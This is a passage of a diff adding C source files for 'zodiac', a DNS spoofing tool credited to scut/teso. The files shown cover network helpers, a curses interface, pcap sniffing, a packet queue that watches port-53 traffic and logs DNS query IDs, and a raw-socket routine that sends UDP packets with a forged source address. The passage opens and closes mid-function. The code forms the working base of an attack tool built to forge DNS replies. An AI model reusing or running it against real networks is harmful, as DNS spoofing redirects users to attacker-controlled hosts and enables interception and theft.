udp_sockfd = socket (AF_INET, SOCK_DGRAM, 0);
if (udp_sockfd == -1)
return;
memset (&udp_to, '\0', sizeof (udp_to));
udp_to.sin_family = AF_INET;
udp_to.sin_addr.s_addr = net_resolve (ip);
udp_to.sin_port = htons (port);
/* send packet
*/
sendto (udp_sockfd, data_enc, len, 0, &udp_to, sizeof (udp_to));
close (udp_sockfd);
free (data_enc);
return;
}
void
udp_send (char *ip_src, unsigned short int port_src,
char *ip_dst, unsigned short int port_dst, char *key,
unsigned char *data, size_t data_len)
{
unsigned char *data_enc,
*pkt_buf;
unsigned short int port_a_src;
size_t len;
char *ip_a_src;
int raw_socket;
ip_a_src = (ip_src == NULL) ? net_getlocalip () : xstrdup (ip_src);
if (key != NULL) {
unsigned char *p_ofs,
*dt;
dt = xcalloc (1, data_len + 2);
memcpy (dt + 2, data, data_len);
p_ofs = dt;
PUTSHORT (data_len, p_ofs);
data_enc = bf_encipher (key, dt, data_len + 2, &len);
free (dt);
} else {
data_enc = xcalloc (1, data_len);
memcpy (data_enc, data, data_len);
len = data_len;
}
port_a_src = (port_src == 0) ? libnet_get_prand (PRu16) : port_src;
pkt_buf = xcalloc (1, len + IP_H + UDP_H);
libnet_build_ip (UDP_H + len, /* content length */
0, /* ip type of service */
libnet_get_prand (PRu16), /* ip id */
0, /* we don't fragment */
64, /* ip ttl */
IPPROTO_UDP, /* ip subproto */
libnet_name_resolve (ip_a_src, 0), /* ip source address */
libnet_name_resolve (ip_dst, 0),/* ip destination address */
NULL, 0, /* payload */
pkt_buf);
libnet_build_udp (port_a_src, /* source port */
port_dst, /* destination port */
data_enc, /* payload r0x0r */
len, /* payload length */
pkt_buf + IP_H);
raw_socket = libnet_open_raw_sock (IPPROTO_RAW);
if (raw_socket != -1) {
libnet_write_ip (raw_socket, pkt_buf, IP_H + UDP_H + len);
close (raw_socket);
}
free (pkt_buf);
free (data_enc);
free (ip_a_src);
return;
}
udp_rcv *
udp_decipher (udp_rcv *ur, char *key)
{
size_t len = ur->udp_len / 8;
unsigned char *deciphered_data;
unsigned char *p_ofs;
socklen_t len_real;
if (len == 0)
return (ur);
deciphered_data = bf_decipher (key, ur->udp_data, len * 8);
free (ur->udp_data);
p_ofs = deciphered_data;
GETSHORT (len_real, p_ofs);
ur->udp_data = xcalloc (1, len_real);
memcpy (ur->udp_data, deciphered_data + 2, len_real);
free (deciphered_data);
ur->udp_len = len_real;
return (ur);
}

133
dns/zodiac/src/io-udp.h Normal file
View file

@ -0,0 +1,133 @@
/* udp io routines
*
* by scut
*
* udp packet routines include file
*/
#ifndef _FNX_IO_UDP_H
#define _FNX_IO_UDP_H
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdio.h>
/* udp receival entity
*/
typedef struct udp_listen {
unsigned long int count; /* number of packets received */
struct in_addr ip; /* ip to receive data on */
unsigned short int port; /* port to receive data on */
int socket; /* listening socket */
struct sockaddr_in addr_serv;
} udp_listen;
/* udp datagram structure
*/
typedef struct udp_rcv {
struct sockaddr_in addr_client; /* source address */
struct timeval udp_time; /* time of receival */
socklen_t udp_len; /* length of the udp datagramm */
unsigned char *udp_data; /* received udp datagramm */
} udp_rcv;
/* udp_listen_free
*
* free a udp_listen structure pointed to by `ul'
*
* return in any case
*/
void udp_listen_free (udp_listen *ul);
/* udp_setup
*
* start a new listening udp service with the bound ip `ip', which can be
* either a numeric ip address or "*" (or NULL) for all locally available
* ip addresses. the listening port is `port'.
*
* return NULL on failure
* return a pointer to a udp_listen structure on success
*/
udp_listen *udp_setup (char *ip, unsigned short int port);
/* udp_rcv_free
*
* free a udp_rcv structure pointed to by `ur'
*
* return in any case
*/
void udp_rcv_free (udp_rcv *ur);
/* udp_receive
*
* receive an udp datagramm on the network entity specified by the `ul'
* structure
*
* return NULL on failure
* return a pointer to a new udp_rcv structure on success
*/
udp_rcv *udp_receive (udp_listen *ul);
/* udp_write
*
* send an udp datagram using the system level datagram sockets. send
* `data_len' bytes from `data' to the host with the ip `ip' on port
* `port'
*
* return in any case
*/
void
udp_write (char *ip, unsigned short int port, unsigned char *data,
size_t data_len, char *key);
/* udp_send
*
* send an udp datagram using raw socket. the datagram will be assigned the
* source ip address of the local host if `ip_src' is NULL and the source IP
* address `ip_src' if it is not. the source port will be random if `port_src'
* equals zero, else it is assigned the value of it.
* the destination ip address is `ip_dst', the destination port is `port_dst'..
* the payload is `data', which is `data_len' bytes long. the data will be
* encrypted with `key' if it is not NULL.
*
* return in any case
*/
void udp_send (char *ip_src, unsigned short int port_src,
char *ip_dst, unsigned short int port_dst, char *key,
unsigned char *data, size_t data_len);
/* udp_decipher
*
* decipher a received udp datagram packet `ur' using the key `key'. actually
* not the key but a sha-1 hash build out of it is used as blowfish encryption
* key. the data contained in the datagram has to have an 8-byte-boundary
* length.
*
* return the same received datagramm but with data decrypted
*/
udp_rcv *udp_decipher (udp_rcv *ur, char *key);
#endif

251
dns/zodiac/src/network.c Normal file
View file

@ -0,0 +1,251 @@
/* zodiac - advanced dns spoofer
*
* network primitives
*
* by scut / teso
* smiler
*
* nearly all of this code wouldn't have been possible without w. richard stevens
* excellent network coding book. if you are interested in network coding,
* there is no way around it.
*/
#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <net/if.h>
#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include "network.h"
struct in_addr localip;
int
net_parseip (char *inp, char **ip, unsigned short int *port)
{
int n;
if (inp == NULL)
return (0);
if (strchr (inp, ':') == NULL)
return (0);
*ip = calloc (1, 256);
if (*ip == NULL)
return (0);
n = sscanf (inp, "%[^:]:%hu", *ip, port);
if (n != 2)
return (0);
*ip = realloc (*ip, strlen (*ip) + 1);
if (*ip == NULL || (*port < 1 || *port > 65535))
return (0);
return (1);
}
char *
net_getlocalip (void)
{
return (strdup (inet_ntoa (localip)));;
}
void
net_ifi_free (struct ifi_info *tf)
{
struct ifi_info *ifi, *ifil;
ifil = NULL;
for (ifi = tf; ifi != NULL; ifi = ifi->ifi_next) {
if (ifil)
free (ifil);
if (ifi->ifi_addr)
free (ifi->ifi_addr);
ifil = ifi;
}
if (ifil)
free (ifil);
return;
}
struct ifi_info *
net_ifi_get (int family, int doaliases)
{
struct ifi_info *ifi, *ifihead, **ifipnext;
int sockfd, len, lastlen, flags, myflags;
char *ptr, *buf, lastname[IFNAMSIZ], *cptr;
struct ifconf ifc;
struct ifreq *ifr, ifrcopy;
struct sockaddr_in *sinptr;
sockfd = socket(AF_INET, SOCK_DGRAM, 0);
if (sockfd == -1)
return (NULL);
lastlen = 0;
len = 100 * sizeof(struct ifreq);
for (;;) {
buf = malloc(len);
if (buf == NULL)
return (NULL);
ifc.ifc_len = len;
ifc.ifc_buf = buf;
if (ioctl(sockfd, SIOCGIFCONF, &ifc) < 0) {
if (errno != EINVAL || lastlen != 0)
return (NULL);
} else {
if (ifc.ifc_len == lastlen)
break;
lastlen = ifc.ifc_len;
}
len += 10 * sizeof(struct ifreq);
free (buf);
}
ifihead = NULL;
ifipnext = &ifihead;
lastname[0] = 0;
for (ptr = buf; ptr < buf + ifc.ifc_len;) {
ifr = (struct ifreq *) ptr;
if (ifr->ifr_addr.sa_family == AF_INET)
len = sizeof(struct sockaddr);
ptr += sizeof(ifr->ifr_name) + len;
if (ifr->ifr_addr.sa_family != family)
continue;
myflags = 0;
if ((cptr = strchr(ifr->ifr_name, ':')) != NULL)
*cptr = 0;
if (strncmp(lastname, ifr->ifr_name, IFNAMSIZ) == 0) {
if (doaliases == 0)
continue;
myflags = IFI_ALIAS;
}
memcpy(lastname, ifr->ifr_name, IFNAMSIZ);
ifrcopy = *ifr;
if (ioctl(sockfd, SIOCGIFFLAGS, &ifrcopy) < 0)
return (NULL);
flags = ifrcopy.ifr_flags;
if ((flags & IFF_UP) == 0)
continue;
ifi = calloc(1, sizeof(struct ifi_info));
if (ifi == NULL)
return (NULL);
*ifipnext = ifi;
ifipnext = &ifi->ifi_next;
ifi->ifi_flags = flags;
ifi->ifi_myflags = myflags;
memcpy(ifi->ifi_name, ifr->ifr_name, IFI_NAME);
ifi->ifi_name[IFI_NAME - 1] = '\0';
#ifdef DEBUG
printf("got: %s\n", ifi->ifi_name);
#endif
switch (ifr->ifr_addr.sa_family) {
case AF_INET:
sinptr = (struct sockaddr_in *) &ifr->ifr_addr;
memcpy(&ifi->ifi_saddr, &sinptr->sin_addr, sizeof(struct in_addr));
if (ifi->ifi_addr == NULL) {
ifi->ifi_addr = calloc(1, sizeof(struct sockaddr_in));
if (ifi->ifi_addr == NULL)
return (NULL);
memcpy(ifi->ifi_addr, sinptr, sizeof(struct sockaddr_in));
}
break;
default:
break;
}
}
free (buf);
return (ifihead);
}
/* partly based on resolv routine from ?
*/
unsigned long int
net_resolve (char *host)
{
long i;
struct hostent *he;
if (host == NULL)
return (htonl (INADDR_ANY));
if (strcmp (host, "*") == 0)
return (htonl (INADDR_ANY));
i = inet_addr (host);
if (i == -1) {
he = gethostbyname (host);
if (he == NULL) {
return (0);
} else {
return (*(unsigned long *) he->h_addr);
}
}
return (i);
}
int
net_printipr (struct in_addr *ia, char *str, size_t len)
{
unsigned char *ipp;
ipp = (unsigned char *) &ia->s_addr;
snprintf (str, len - 1, "%d.%d.%d.%d", ipp[3], ipp[2], ipp[1], ipp[0]);
return (0);
}
int
net_printip (struct in_addr *ia, char *str, size_t len)
{
unsigned char *ipp;
ipp = (unsigned char *) &ia->s_addr;
snprintf (str, len - 1, "%d.%d.%d.%d", ipp[0], ipp[1], ipp[2], ipp[3]);
return (0);
}
int
net_printipa (struct in_addr *ia, char **str)
{
unsigned char *ipp;
ipp = (unsigned char *) &ia->s_addr;
*str = calloc (1, 256);
if (*str == NULL)
return (1);
snprintf (*str, 255, "%d.%d.%d.%d", ipp[0], ipp[1], ipp[2], ipp[3]);
*str = realloc (*str, strlen (*str) + 1);
return ((*str == NULL) ? 1 : 0);
}

126
dns/zodiac/src/network.h Normal file
View file

@ -0,0 +1,126 @@
/* zodiac - advanced dns spoofer
*
* ripped down network.c for use with zodiac
*
* by scut / teso
*/
#ifndef Z_NETWORK_H
#define Z_NETWORK_H
#include <sys/socket.h>
#include <net/if.h>
#include <netinet/in.h>
#include <stdio.h>
#define IFI_NAME 16
#define IFI_HADDR 8
/* struct ifi_info
*
* a linked list giving information about all the network interfaces available
* a pointer to this struct list is returned by net_get_ifi.
*/
struct ifi_info {
char ifi_name[IFI_NAME];
u_char ifi_haddr[IFI_HADDR];
u_short ifi_hlen;
short ifi_flags;
short ifi_myflags;
struct sockaddr *ifi_addr;
struct in_addr ifi_saddr;
struct ifi_info *ifi_next;
};
#define IFI_ALIAS 1
typedef struct bound {
int bs; /* bound socket */
unsigned short port; /* port we bound to */
struct sockaddr bsa; /* bs_in */
} bound;
extern int net_readtimeout;
extern int net_conntimeout;
extern int net_identtimeout;
/* net_parseip
*
* read an ip in the format "1.1.1.1:299" or "blabla:481" into
* the char pointer *ip and into the port *port
*
* return 0 on failure
* return 1 on success
*/
int net_parseip (char *inp, char **ip, unsigned short int *port);
/* net_getlocalip
*
* give back the main IP of the local machine
*
* return the local IP address as string on success
* return NULL on failure
*/
char *net_getlocalip (void);
/* net_get_ifi
*
* get network interface information
*
* return NULL on failure
* return a pointer to a linked list structure ifi_info (see above)
*/
struct ifi_info *net_ifi_get (int family, int doaliases);
/* net_ifi_free
*
* free the linked list associated with `tf'.
*
* return in any case
*/
void net_ifi_free (struct ifi_info *tf);
/* net_resolve
*
* resolve a hostname pointed to by `host' into a s_addr return value
*
* return the correct formatted `s_addr' for this host on success
* return 0 on failure
*/
unsigned long int net_resolve (char *host);
/* net_printip
*
* print an IP address stored in the struct in_addr pointed to by `ia' to a
* string `str' with a maximum length of `len'.
*
* return 0 on success
*Üreturn 1 on failure
*
* net_printipa behaves the same way, except it allocates memory and let
* `*str' point to the string
*
* net_printipr behaves like net_printip, except the IP is printed in
* reverse quad dotted order (dns labels)
*/
int net_printip (struct in_addr *ia, char *str, size_t len);
int net_printipa (struct in_addr *ia, char **str);
int net_printipr (struct in_addr *ia, char *str, size_t len);
#endif

152
dns/zodiac/src/output.c Normal file
View file

@ -0,0 +1,152 @@
/* zodiac - output module
*
* by scut / teso
*
* buy "Programming with Curses" if you mind understanding this :)
*/
#define OUTPUT_MAIN
#include <stdarg.h>
#include <stdio.h>
#include <unistd.h>
#include <pthread.h>
#include <ncurses.h>
#include "common.h"
#include "output.h"
#include "zodiac.h"
mscr *
out_init (void)
{
mscr *nm = xcalloc (1, sizeof (mscr));
pthread_mutex_init (&nm->outm, NULL);
initscr (); /* initialize curses, get termcaps etc. */
crmode (); /* cooked raw (control char's to kernel, rest to us */
echo (); /* echo inputs */
nl (); /* newline on wraps */
meta (stdscr, TRUE);
keypad (stdscr, TRUE);
scrollok (stdscr, FALSE);
attrset (A_NORMAL);
if (stdscr->_maxx < 79 || stdscr->_maxy < 20)
return (NULL);
m_drawbox (stdscr, 0, 0, stdscr->_maxy, stdscr->_maxx);
move (0, 1);
printw ("= zodiac "VERSION" = by "AUTHORS" =");
refresh ();
/* create configuration, process and udp sniff window */
nm->winsh = m_subwin (9, stdscr->_maxx, 1, 0, "console");
nm->winproc = m_subwin (10, stdscr->_maxx / 2, 11, 0, "process");
nm->winid = m_subwin (10, stdscr->_maxx / 2 + 1, 11, stdscr->_maxx / 2, "id");
nm->windns = m_subwin (stdscr->_maxy - 21, stdscr->_maxx, 21, 0, "dns packets");
if (nm->winsh == NULL || nm->winproc == NULL || nm->windns == NULL)
return (NULL);
touchwin (stdscr);
move (0, 0);
refresh ();
return (nm);
}
void
m_printfnr (mscr *screen, WINDOW *win, char *str, ...)
{
va_list vl;
pthread_mutex_lock (&screen->outm);
va_start (vl, str);
vw_printw (win, str, vl);
va_end (vl);
pthread_mutex_unlock (&screen->outm);
return;
}
void
m_printf (mscr *screen, WINDOW *win, char *str, ...)
{
va_list vl;
pthread_mutex_lock (&screen->outm);
va_start (vl, str);
vw_printw (win, str, vl);
va_end (vl);
wrefresh (win);
pthread_mutex_unlock (&screen->outm);
return;
}
/* create a subwin from stdscr, putting a nice border around it and set a
* title
*/
WINDOW *
m_subwin (int lines, int cols, int y1, int x1, char *title)
{
WINDOW *nw;
nw = subwin (stdscr, lines - 2, cols - 2, y1 + 1, x1 + 1);
if (nw == NULL)
return (NULL);
meta (nw, TRUE);
keypad (nw, TRUE);
scrollok (nw, TRUE);
m_drawbox (stdscr, y1, x1, y1 + lines, x1 + cols);
if (title != NULL) {
move (y1, x1 + 1);
printw ("= %s =", title);
}
wmove (nw, 0, 0);
return (nw);
}
void
m_drawbox (WINDOW *win, int y1, int x1, int y2, int x2)
{
int x, y;
if (y1 >= y2 || x1 >= x2)
return;
for (y = y1, x = x2 - 1; x > x1; --x) {
wmove (win, y, x);
waddch (win, '-');
}
for (y = y2 - 1; y > y1; --y) {
wmove (win, y, x1);
waddch (win, '|');
wmove (win, y, x2);
waddch (win, '|');
}
for (y = y2, x = x2 - 1; x > x1; --x) {
wmove (win, y, x);
waddch (win, '-');
}
wmove (win, y1, x1);
waddch (win, '+');
wmove (win, y1, x2);
waddch (win, '+');
wmove (win, y2, x1);
waddch (win, '+');
wmove (win, y2, x2);
waddch (win, '+');
return;
}

31
dns/zodiac/src/output.h Normal file
View file

@ -0,0 +1,31 @@
/* zodiac - output module
* include file
*
* by scut / teso
*
* buy "Programming with Curses" if you mind understanding this :)
*/
#ifndef Z_OUTPUT_H
#define Z_OUTPUT_H
#include <ncurses.h>
#include <pthread.h>
typedef struct mscr {
pthread_mutex_t outm; /* output mutex */
WINDOW *winsh; /* configuration window */
WINDOW *winproc; /* process / status window */
WINDOW *winid; /* dns ID window */
WINDOW *windns; /* incoming DNS packets window */
} mscr;
mscr *out_init (void);
void m_printfnr (mscr *screen, WINDOW *win, char *str, ...);
void m_printf (mscr *screen, WINDOW *win, char *str, ...);
WINDOW *m_subwin (int lines, int cols, int y1, int x1, char *title);
void m_drawbox (WINDOW *win, int y1, int x1, int y2, int x2);
#endif

422
dns/zodiac/src/packet.c Normal file
View file

@ -0,0 +1,422 @@
/* zodiac - advanced dns spoofer
*
* packet handling and queueing routines
* by scut
* -Smiler
* Changed pq_grind to remove link layer. Changed other functions to
* accept ip packets instead of ethernet packets.
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <semaphore.h>
#include <pthread.h>
#include <pcap.h>
#include "common.h"
#include "packet.h"
#include "output.h"
#include "sniff.h"
#include "zodiac.h"
#include "dns.h"
#include "dnsid.h"
#include "dns-tag.h"
/* pq_grind
*
* grind the packets received from the sniffer thread, stripping ethernet
* header, filter non-TCP packets, add them to the packet queue, then raise
* the correct semaphore.
*
* `sinfo' gives information about the sniffing thread and the packet queue,
* `pkthdr' is from the pcap handler and `pkt' contains the real packet data.
*/
void
pq_grind (void *sinfov, struct pcap_pkthdr *pkthdr, u_char *pkt)
{
sniff_info *sinfo = (sniff_info *) sinfov;
if (sinfo->device->linktype == DLT_EN10MB) {
if (((eth_hdr *)pkt)->ether_type != htons(ETHERTYPE_IP))
goto pq_glend;
}
pkt += sinfo->device->linkhdrlen;
pkthdr->caplen -= sinfo->device->linkhdrlen;
/* check if it is a IP/UDP packet, if not, silently skip it
*/
id_qprint (ms, ms->winid);
if (pq_filter (pkt, pkthdr->caplen) == 0)
goto pq_glend;
/* compute real IP/UDP packet size and append it to the right queue
*/
if (pq_add (pkt, pkthdr->caplen, &pkthdr->ts, sinfo->pq_thd))
goto pq_glend;
/* notify the corresponding thread about the new packet in it's queue
*/
pq_notify (sinfo->pq_thd);
pq_glend:
return;
}
/* pq_add
*
* append a packet queue description (pq_desc) with packet content `p_data' to
* the packet queue associated with thread `thd'.
* the packet data is copied, so the packet data pointer `p_data' has to be
* freed by the calling function. the time value `rcv_time' is the time when the
* packet was sniffed from the pcap library.
*
* return 0 on success
* will never fail tho ;-D
*/
int
pq_add (unsigned char *p_data, unsigned long int p_size, struct timeval *rcv_time, pq_thread *pqt)
{
pq_desc *np; /* new packet in queue */
np = xcalloc (1, sizeof (pq_desc));
/* initialize the packet mutex and get hold of it
*/
pthread_mutex_init (&np->pq_mutex, NULL);
pthread_mutex_lock (&np->pq_mutex);
/* get memory for the packet
*/
np->p_len = p_size;
np->p_data = xcalloc (1, np->p_len);
/* copy packet data, create hash and copy time values
*/
memcpy (np->p_data, p_data, np->p_len);
np->next = NULL;
memcpy (&np->rcv_time, rcv_time, sizeof (struct timeval));
/* now add the packet to the thread queue
*/
pthread_mutex_lock (&pqt->pq_mutex);
/* no packet added yet, then just modify the root pointer, else
* append the packet
*/
if (pqt->root == NULL) {
pqt->root = np;
} else {
pq_desc *cur = pqt->root; /* help pointers to step through the list */
pq_desc *last = pqt->root;
/* cycle through linked list, until end is reached
*/
while (cur != NULL) {
last = cur;
pthread_mutex_lock (&last->pq_mutex);
cur = last->next;
pthread_mutex_unlock (&last->pq_mutex);
}
pthread_mutex_lock (&last->pq_mutex);
last->next = np;
pthread_mutex_unlock (&last->pq_mutex);
}
pthread_mutex_unlock (&pqt->pq_mutex);
pthread_mutex_unlock (&np->pq_mutex);
/* added packet successfully
*/
return (0);
}
/* pq_handle
*
* main (threaded) packet processor routine
*/
void *
pq_handle (pq_thread *pq)
{
pq_desc *packet; /* packet pointer */
ip_hdr *ip; /* IP packet header pointer */
udp_hdr *udp; /* UDP packet header pointer */
dns_hdr *dns; /* DNS receive header pointer */
unsigned char *data; /* packet data pointer :-) */
char *p_data;
// unsigned long p; /* packet counter */
m_printf (ms, ms->windns, "[zod] hello world from the packetizer thread\n");
do {
unsigned int psize;
do {
sem_wait (&pq->pq_active); /* wait for a packet */
/* get, unlink and then process the packet
*/
packet = pq_get (pq);
} while (packet == NULL);
p_data = packet->p_data;
pq_offset (p_data, &ip, &udp, &dns, &data);
/* hexdump ("packets-rawdns", (unsigned char *) ip, (packet->p_len - sizeof (eth_hdr)));
debugp ("packets-rawdns", "ip=%08x\nudp=%08x\ndns=%08x\ndata=%08x\n", ip, udp, dns, data);
*/
psize = packet->p_len;
dns_handle (ip, udp, dns, data, psize);
/* now, if the packet is directed to port 53, we add the id to the queue
* then update the display. but first check whether it is a self-originated
* packet, then skip the whole procedure.
*/
if (udp->uh_dport == htons (53) && dns_tag_check_n (&ip->ip_src,
&ip->ip_dst, htons (udp->uh_sport), htons (udp->uh_dport),
htons (dns->id)) == 0)
{
id_add (ip->ip_src, ntohs (dns->id), &packet->rcv_time);
id_qprint (ms, ms->winid);
}
pq_free (packet);
} while (1);
return (NULL);
}
/* pq_create
*
* create a packet handler
*
* return NULL on failure
* return pointer to pq_thread structure on success
*/
pq_thread *
pq_create (void)
{
int n; /* temporary return value */
pq_thread *pq_new; /* main thread structure of new thread */
pq_new = xcalloc (1, sizeof (pq_thread));
pthread_mutex_init (&pq_new->pq_mutex, NULL);
pq_new->pq_count = pq_new->pq_curcount = 0;
sem_init (&pq_new->pq_active, 0, 0);
n = pthread_create (&pq_new->pq_tid, NULL, (void *) pq_handle, (void *) pq_new);
if (n == -1) {
pq_destroy (pq_new);
return (NULL);
}
return (pq_new);
}
void
pq_destroy (pq_thread *pq)
{
pthread_mutex_destroy (&pq->pq_mutex);
sem_destroy (&pq->pq_active);
free (pq);
return;
}
/* pq_notify
*
* notify the correct thread using a semaphore
*/
void
pq_notify (pq_thread *pqt)
{
/* raise the semaphore
*/
sem_post (&pqt->pq_active);
return;
}
/* pq_get
*
* return one packet from the packet stack pointed to by `pqt'.
*
* return NULL on failure
* return pointer to packet description on success
*/
pq_desc *
pq_get (pq_thread *pqt)
{
pq_desc *next;
pq_desc *this = NULL;
pthread_mutex_lock (&pqt->pq_mutex);
next = pqt->root;
if (next != NULL) {
/* if there is a packet, unlink first one, and shift all
* following packets
*/
pthread_mutex_lock (&pqt->root->pq_mutex);
next = pqt->root->next;
pthread_mutex_unlock (&pqt->root->pq_mutex);
/* shift packets, we are helding pq_mutex tho :)
*/
this = pqt->root;
pqt->root = next;
}
pthread_mutex_unlock (&pqt->pq_mutex);
return (this);
}
/* pq_remove
*
* remove the first packet from packet thread queue `thd'.
*
* return in any case
*/
void
pq_remove (pq_thread *pqt)
{
pq_desc *next;
pthread_mutex_lock (&pqt->pq_mutex);
if (pqt->root != NULL) {
pthread_mutex_lock (&pqt->root->pq_mutex);
next = pqt->root->next;
pthread_mutex_unlock (&pqt->root->pq_mutex);
pq_free (pqt->root);
pqt->root = next;
}
pthread_mutex_unlock (&pqt->pq_mutex);
return;
}
/* pq_free
*
* free a pq_desc structure with all associated data
*/
void
pq_free (pq_desc *packet)
{
/* some sanity checking inside :)
*/
if (packet == NULL)
return;
/* if data is associated, free it
*/
if (packet->p_data != NULL) {
free (packet->p_data);
}
/* destroy mutex and free structure
*/
pthread_mutex_destroy (&packet->pq_mutex);
free (packet);
return;
}
/* pq_filter
*
* check wether packet with packet data pointed to by `p_data' is a UDP
* nameserver packet or not
*
* return 1 if it is
* return 0 if it is not
*/
int
pq_filter (unsigned char *p_data, unsigned long p_size)
{
int iplen;
ip_hdr *ip = NULL;
udp_hdr *udp = NULL;
if (p_size < (sizeof (ip_hdr) + sizeof (udp_hdr) + sizeof (dns_hdr)))
return (0);
/* now check if the ip header encloses a udp packet
*/
ip = (ip_hdr *) (p_data); /* caveat here: don't miss brackets ! */
if (ip->ip_p != IPPROTO_UDP)
return (0);
iplen = ip->ip_hl << 2;
/* finally check the source/destination ports for the nameserver
* port 53
*/
udp = (udp_hdr *) (p_data + iplen);
if ((udp->uh_dport != htons (53)) && (udp->uh_sport != htons (53)))
return (0);
/* it is a udp dns packet
*/
return (1);
}
/* pq_offset
*
* stupidly calculate offsets for IP, UDP and DNS offsets within a IP data
* block
*
* return nothing
*/
void
pq_offset (unsigned char *data, ip_hdr **ip, udp_hdr **udp, dns_hdr **dns, unsigned char **dns_data)
{
size_t ip_len;
if (data == NULL)
return;
*ip = (ip_hdr *) data;
ip_len = (*ip)->ip_hl << 2;
*udp = (udp_hdr *) (data + ip_len);
*dns = (dns_hdr *) (data + ip_len + sizeof (udp_hdr));
*dns_data = (unsigned char *) (data + ip_len + sizeof (udp_hdr) + sizeof (dns_hdr));
return;
}

85
dns/zodiac/src/packet.h Normal file
View file

@ -0,0 +1,85 @@
/* snifflib
*
* by scut, smiler
*
*/
#ifndef Z_PACKET_H
#define Z_PACKET_H
#include <sys/time.h>
#include <arpa/nameser.h>
#include <netinet/in.h>
#include <pcap.h>
#include <semaphore.h>
#include <pthread.h>
#include <libnet.h>
/* packet structures
*
* we tried to be as portable as possible
*/
typedef struct libnet_ethernet_hdr eth_hdr;
typedef struct libnet_ip_hdr ip_hdr;
typedef struct libnet_udp_hdr udp_hdr;
typedef HEADER dns_hdr; /* HEADER is in arpa/nameser.h */
/* pq_desc
*
* describe one packet within the packet queue. the data is only to be read
* and write if `pq_mutex' is hold. `next' points to the next pq_desc within
* this packet queue, hash is the hash id of the packet (TCP only), `p_data'
* is the actual packet data (at IP level)
*/
typedef struct pq_desc {
pthread_mutex_t pq_mutex; /* mutex over this structure */
struct pq_desc *next; /* pointer to the next packet in the queue */
struct timeval rcv_time; /* time when the packet was received */
unsigned long int p_len; /* overall packet length */
unsigned char *p_data; /* actual packet data, link layer stripped already */
} pq_desc;
/* pq_thread
*
* describe a) one packet processing thread (tid, semaphore)
* b) packet queue root pointer (linked list of pq_desc structs)
* c) stats for this queue
*
* if the sniffing thread has encountered a packet that it added to this
* packetizing queue, it will raise the `pq_active' :-)
*/
typedef struct pq_thread {
pthread_t pq_tid; /* thread ID */
sem_t pq_active; /* new packet semaphore, yeah =) */
pthread_mutex_t pq_mutex; /* mutex over this structure */
unsigned long int pq_count; /* number of packets processed in this queue */
unsigned long int pq_curcount; /* number of packets currently in this queue */
pq_desc *root; /* root pointer of the linked list in this queue (NULL for empty) */
} pq_thread;
void *pq_handle (pq_thread *pq);
pq_thread *pq_create (void);
void pq_destroy (pq_thread *pq);
pq_desc *pq_get (pq_thread *pqt);
void pq_grind (void *sinfov, struct pcap_pkthdr *pkthdr,
unsigned char *pkt);
int pq_add (unsigned char *p_data, unsigned long int p_size,
struct timeval *rcv_time, pq_thread *pqt);
void pq_notify (pq_thread *pqt);
void pq_remove (pq_thread *pqt);
void pq_free (pq_desc *packet);
int pq_filter (unsigned char *p_data, unsigned long p_size);
void pq_offset (unsigned char *data, ip_hdr **ip, udp_hdr **udp,
dns_hdr **dns, unsigned char **dns_data);
#endif

311
dns/zodiac/src/sniff.c Normal file
View file

@ -0,0 +1,311 @@
/* zodiac - advanced dns spoofer
*
* sniffing functions
*
* by scut, smiler
*
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <pcap.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "common.h"
#include "packet.h"
#include "output.h"
#include "sniff.h"
#include "zodiac.h"
extern struct in_addr localip;
/* sniff_new
*
* the only function that should be called from outside. set up sniffing
* device, create a new thread, then return.
* open `interface' device for sniffing, tell sniffing thread to use
* `pq_size' packet queues, available through `pq_list'.
* store thread id of new thread in `tid'.
*
* return 0 if thread creation was successful
* return 1 if thread creation failed
*/
int
sniff_new (pthread_t *tid, char *interface, pq_thread *pq_thd)
{
int n; /* temporary return value */
sniff_info *sinfo; /* sniff information structure */
sinfo = xcalloc (1, sizeof (sniff_info));
/* open interface
*/
sinfo->device = sniff_open (interface);
if (sinfo->device == NULL) {
free (sinfo);
return (1);
} else if (sinfo->device->error == 1) {
return (1);
}
if (sniff_dev_ip (interface, &localip) != 0) {
free (sinfo);
return (1);
}
/* store information into sinfo
*/
sinfo->pq_thd = pq_thd;
/* and create our neat thread :)
*/
n = pthread_create (tid, NULL, (void *) sniff_handle, (void *) sinfo);
if (n == -1) {
sniff_dev_free (sinfo->device);
free (sinfo);
return (1);
}
/* successfully created sniffer thread
*/
return (0);
}
/* sniff_handle
*
* the main sniffing thread, fetching packets from the device, then calling
* the packet grinder `pq_grind' to process the packets
*
* should never return except on error or program exit
*/
void *
sniff_handle (sniff_info *sinfo)
{
int n; /* temporary return value */
pcap_handler grinder; /* pcap handler for the packet grinding function */
m_printf (ms, ms->winproc, "[zod] hello world from sniffing thread\n");
/* sniff packets forever, until an error appears. pass incoming packets
* to `pq_grind'.
*/
grinder = (pcap_handler) pq_grind;
/* loop packets to pq_grind until error, passing sinfo struct for queueing
*/
n = pcap_loop (sinfo->device->pd, -1, grinder, (void *) sinfo);
/* on error print error message, then free the device and terminate the
* thread
*/
if (n == -1) {
m_printf (ms, ms->winproc, "[zod] sniff_handle (pcap_loop): %s\n", pcap_geterr (sinfo->device->pd));
}
return (NULL);
}
/* sniff_filter
*
* install a filter `filter' on device `device', with netmask `netmask'
*
* return 0 on success
* return 1 on failure
*/
int
sniff_filter (s_dev *device, char *filter, bpf_u_int32 netmask)
{
int n; /* temporary return value */
struct bpf_program fprog; /* berkeley packet filter program structure */
n = pcap_compile (device->pd, &fprog, filter, 1, netmask);
if (n == -1) {
m_printf (ms, ms->winproc, "[zod] sniff_filter (pcap_compile): failed to compile bpf program\n");
return (1);
}
n = pcap_setfilter (device->pd, &fprog);
if (n == -1) {
m_printf (ms, ms->winproc, "[zod] sniff_filter (pcap_setfilter): failed to set bpf on %s\n", device->interface);
